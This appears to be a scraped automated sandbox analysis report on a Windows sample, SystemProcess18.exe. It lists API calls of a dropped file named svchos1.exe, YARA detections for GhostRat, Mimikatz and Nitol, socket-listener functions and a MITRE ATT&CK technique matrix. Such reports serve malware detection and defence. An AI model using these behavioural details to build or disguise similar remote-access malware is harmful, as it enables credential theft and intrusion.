Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_007B4EBA GetSystemTimeAsFileTime,__aulldiv,

28_2_007B4EBA

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035DC690 strrchr,strrchr,strrchr,strncpy,GetUserNameA,_strcmpi,sprintf,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,strstr,strstr,strstr,lstrcat,lstrcat,lstrcat,lstrcpy,_strcmpi,_strcmpi,_strcmpi,_strcmpi,_strcmpi,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

28_2_035DC690

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_007BD290 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

28_2_007BD290

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_006C7777

Source: C:\Users\user\Desktop\SystemProcess18.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: svchos1.exe

Binary or memory string: 360Tray.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE

Yara detected Mimikatz

Source: Yara match	File source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.3732839256.000000000316B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3734597891.000000000356C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3734864842.00000000036AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3732199510.0000000002A6C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Nitol

Source: Yara match	File source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE

Yara detected Nitol

Source: Yara match	File source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035E4150 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,	28_2_035E4150
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035E3D90 socket,bind,getsockname,inet_addr,	28_2_035E3D90
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030A4150 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,	29_2_030A4150
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030A3D90 socket,bind,getsockname,inet_addr,	29_2_030A3D90

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	11 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Windows Service	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	Login Hook	11 Windows Service	1 DLL Side-Loading	NTDS	1 System Service Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 Masquerading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	121 Virtualization/Sandbox Evasion	Cached Domain Credentials	37 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	351 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	121 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Indicator Removal	/etc/passwd and /etc/shadow	2 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SystemProcess18.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SystemProcess18.exe